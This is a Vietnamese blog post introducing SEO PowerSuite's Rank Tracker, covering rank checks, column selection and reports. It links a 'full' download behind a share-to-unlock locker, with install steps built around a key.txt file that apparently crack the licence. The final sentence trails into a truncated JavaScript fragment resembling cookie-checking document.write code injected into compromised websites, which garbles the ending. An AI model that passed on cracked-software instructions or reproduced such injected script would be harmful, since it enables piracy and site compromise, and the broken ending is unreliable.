Seo PowerSuite

Một SEOer chuyên nghiệp hay nghiệp dư đều cần kiểm soát chiến dịch của mình. Có lẽ rất nhiều bạn đã biết Rank Tracker trong bộ Seo Power Suite, đây là phần mềm quản lý thứ hạng từ khóa hay nhất mà tôi từng dùng. Bộ Seo Power Suite tôi cũng chỉ dùng mỗi Rank Tracker. Hôm nay tôi sẽ giới thiệu với các bạn phần mềm này.

Tải về và Cài đặt Seo Power Suite

[social-locker locker_id=”ab214154c5849d670″ theme=”blue” message=”Share để thấy đường link tải SEO Powersuite Full” facebook=”true” likeurl=”CURRENT” google=”true” googleurl=”CURRENT” tweet=”true” tweettext=”” tweeturl=”CURRENT” follow=”true” linkedin=”true” linkedinurl=”CURRENT”]Download bản Seo Power Suite full tại đây.[/social-locker]

 

Cách cài đặt tôi sẽ không nói chi tiết vì nhiều nơi đã hướng dẫn rồi. Tôi vẫn dùng bản 5.7.3 vì các bản 6.x.x check rank không chính xác cho lắm. Cách cài đặt rất đơn giản, đầu tiên bạn cài bản Seo Power Suite 4.5.7, mở file key.txt làm theo, sau đó cài đè bản 5.7.3.

Hướng dẫn sử dụng Rank Tracker

Kiểm tra thứ hạng

Cái này cũng không có nhiều điều để nói, bạn chỉ cần chọn New, chọn các Search Engine cần kiểm tra thứ hạng và check là xong.

Các cột cần hiển thị

Các bạn chuột phải vào thanh taskbar như hình dưới. Ở đây có rất nhiều cột cho các bạn lựa chọn, tôi lựa chọn #, Keyword, URL Found (đường dẫn lên TOP), Web Rank và Web Different (khác thế nào so với lần check trước)

Như vậy ta có thêm cột đường dẫn lên top, và khác biệt so với lần check trước. Đặc biệt là cột khác biệt so với lần trước hiển thị màu xanh nếu tăng và màu đỏ nếu giảm. Nếu một buổi sáng đẹp trời bạn check rank xong toàn màu xanh hãy ăn mừng, còn nếu toàn màu đỏ hãy tìm nguyên nhân để có giải pháp phù hợp.

Báo cáo

Rất đơn giản, bạn click vào tab báo cáo, chờ một lúc sẽ có báo cáo tổng hợp như sau:

Nhìn biểu đồ bạn sẽ có cái nhìn tổng quan về chiến dịch của mình, có rất nhiều Template để bạn lựa chọn. Nếu bạn làm dịch vụ Seo, cũng có thể làm một template tiếng Việt để báo cáo cho khách hàng như công ty Seo Pridio của tôi:

Ngoài ra những tính năng trên, Rank Tracker còn có chức năng so sánh với đối thủ cạnh tranh, chế độ giả lập người để không phải gõ Captcha và nhiều tính năng khác nữa chờ bạn khám phá ở phần Preferences của Rank Tracker. 3 phần mềm còn lại cũng có những công dụng rất hay, cách sử dụng cũng tương tự Rank Tracker, bạn cứ mò trong Preference là ra hết, tất nhiên là cần 1 chút đọc hiểu tiếng Anh.

Chúc các bạn thành công với SEO. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘